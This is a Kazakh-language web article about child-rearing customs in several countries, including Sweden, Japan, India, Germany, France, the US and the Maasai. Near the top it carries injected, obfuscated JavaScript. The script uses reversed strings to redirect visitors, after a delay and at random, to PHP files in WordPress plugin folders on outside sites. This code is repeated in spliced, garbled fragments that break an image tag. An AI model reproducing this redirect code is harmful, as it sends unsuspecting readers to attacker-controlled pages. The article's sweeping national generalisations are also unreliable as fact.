Қай ұлт баласын қалай тәрбиелейді?

deti_myra$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tories/deti_myra.jpg» height=»97″ width=»126″ />Біз өз балаларымыздың қандай тәлім-тәрбиемен өсіп жатқанын, бала өміріне қатысты қандай салт-дәстүріміз бен әдет-ғұрпымыз бар екенін жақсы білеміз. Дегенмен, жер шарындағы өзге елдер  балаларын қалай тәрбиелейді, қандай ерекшеліктері бар бұл туралы біле бермейміз. Олай болса, шет ел балалары қалай тәрбиеленуде, неге солармен танысып шықпасқа? Бұл әдетте біздің ата-аналарымызға, бала оқытушы ұстаздарға нағыз қажетті де, қызықты тақырып болуы мүмкін. Себебі, бөтен мемлекеттердегі бүлдіршіндердің, жасөспірімдердің өмірге көзқарасы қандай, олардан үйренетін әдіс-тәсілдер бар ма деген ой кімге болсын жағымды.
Рас, әрқандай елдің балалары бір-біріне ұқсамайды. Бірақ, біле білсек олардың барлығына бір ғана нәрсе қажет: туған отбасы, ұядай жылы үй, ата-анасының қамқорлығы мен сүйіспеншілігі. Қанекей, ендеше әлем балаларының елдеріне саяхат жасап келейік. Олар қалай өмір сүріп жатыр екен?

Швецияның балалары. Швед отбасылары балаға сәби кезінен жеке тұлға ретінде қарап, еркін тәрбиелеуге тырысады. Қатаң жазалауларға тыйым салынған, тіпті мұны бұл елде қылмыс деп есептейді. Сондықтан, әрбір шведтік балақай әке-шешесі өзіне қол жұмсаса, полицияға хабарлауға мүмкіндігі бар. Мұндай кезде ата-аналарға әкімшілік тарапынан жаза қолданылады.

Жапонияның балалары. Жапонияның көптеген мектептерінде асхана жоқ. Балалар түскі астарын үйден арнайы ыдысқа салып әкеледі. Ал, мұғалімдер болса, балалардың үйден әкелген тамақтары денсаулыққа зиян емес пе, соны мұқият қадағалайды. Сол себепті,  жапон аналар арнайы оқу-сабақтарға қатысады. Ол жерде баланың ағзасына қажетті дәрумендер тамақпен сіңу үшін қандай ас әзірлеу керек және қалай даярлау керек, бәрін түсіндіріп үйретеді.

Үндістан балалары. Үндістер балаларын қатаң ұстайды. Оларда ата-ана мен бала арасындағы достық қарым-қатынасты өте сирек кездестіресіз. Балалар кішкентай кезінен бастап ата-анасының таңдауына, қалауына мойынсұнып өседі. Сондықтан өсе келе ержеткенде немесе бойжеткенде әке-шешесі кімді қалайды, соған үйленеді.

Германияның балалары. Германия мектептерінде міндетті түрде экскурсиялық сабақтар ұйымдастырылады. Оларда бұл мектеп бағдарламаларына әбден енген. Мысалы, мұғалім бүгін шоколад туралы, оның құрамы жөнінде сабақ өтті ме, онда ертең балалар -шоколад музейіне немесе фабрикаға саяхат жасайды деген сөз. Олар фабрикада өнімнің қалай жасалып жатқанын өз көздерімен көріп, танып біледі.

Ауғанстан балалары. Баланың дүниеге келгені, әсіресе ұл баланың өмір есігін ашқаны ауғандықтар үшін үлкен қуаныш. Ауқатты тұратын отбасылар ұлан-асыр той жасайды. Ауылдарда той үстінде «ат байлар» ұлдың құрметіне барабан қағылып, аспанға қарумен оқ атылады.

Қытайдың балалары. Дао уағызшыларының бала туралы өсиеті әрбір қытай бүлдіршініне аңыз болып айтылады. Былай дейді: «Балаға тәтті жеуді ұсынғанда, ол ақылдылықпен бас тартты. Неге? «Мен әлі кішкентаймын, сондықтан маған аз ғана бөлігі жетеді» деп түсіндірді бала мұнысын. Баланың осы қылығын барлық қытай перзентіне үлгі етеді, баламыз қанағатшыл, мейірімді, адамгершілігі жоғары болып өссін дегені.

Франция балалары. Француздардың ежелгі дәстүрі бойынша бала дүниеге келмей тұрып, оның тәрбиесімен айналысуды қолға алу керек. Сәби қалай өмірге келеді, солай оны ауылға аттандырады. Балақай екі-үш жасқа дейін өзінің ата-бабасы қоныс тепкен ауылда болып, сол жердің суын ішіп, ауасын жұтып өседі.

Бразилия балалары. Бразилияда баланы ұл немесе қыз бала деп бөле-жармай, бірге тәрбиелегенді жөн санайды. Сол себепті, бес жасқа дейін ер балалар мен қыз балалар бірге асыр салып ойнайды. Ал, бес жастан кейін ғана олар қыз бала мен қыз баланың, ұл бала мен ұл баланың достасуына мүмкіндік жасайды.

Румын балалары. Үлкендерге құрмет көрсету керек, әсіресе ата-ананы жақсы көріп, сыйлай білу керек, сонымен бірге әрқашан әділ болу керек. Мұндай өнегелі сөздерді румындықтар балаларына үнемі үйретіп отырады. Ата-әжелері немерелеріне ата-бабаларының тарихын баяндап, румын халқына тән салт-дәстүрлердің берік сақталуына, бағалануына және мұның бәрі тәрбие арқылы іске асуына күшін салады.

Лаос балалары. Лаостықтар балаларын өздері тікелей тәрбиелегеннен гөрі бауырлары, туыстары, басқа да жақындарының ықпалы арқылы әсер етіп, өсіргенді дұрыс көреді. Балалары ержетіп үйленер жасқа жеткенде де осы әдісті қолданады. Яғни, ата-анасы туыстары арқылы сөзін жеткізіп, балаларына үйленуге рұқсат береді.

АҚШ балалары. Жергілікті педагогика «әрбір бала өз бетінше өмір сүріп үйрене алу керек» деген ұстанымды қолданады. Сондықтан, американдық ата-аналар балаларының қалауына қарсы шыға алмайды. Олар мейрамханаға, коктейлге, тіпті түнгі клубқа барамын десе де, ата-аналар ертіп апарады.

Африка балалары (Масай тайпасы). Масайлықтардың өмір сүру кестесі жасалып қойылған. Он бес жасында ұлдар «маран» атанады. Бұл әскери шен, яғни ол осы жасынан тайпаны қорғаушы ержүрек азамат. Отыз жасында отбасын құрады және бала-шағасын асырау үшін өз алдына табын-табын мал бағады. Қырық бес жасында жастарды тәрбиелеумен айналысады, сонымен бірге тайпа халқы үшін жауапты шешімдер қабылдайды. Ал, алпыс жасында тайпаның «рухани көсемі» болады.

Дайындаған Ғанибек АБЕНОВ{jcomments on}

Leave a Reply

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Яндекс.Метрика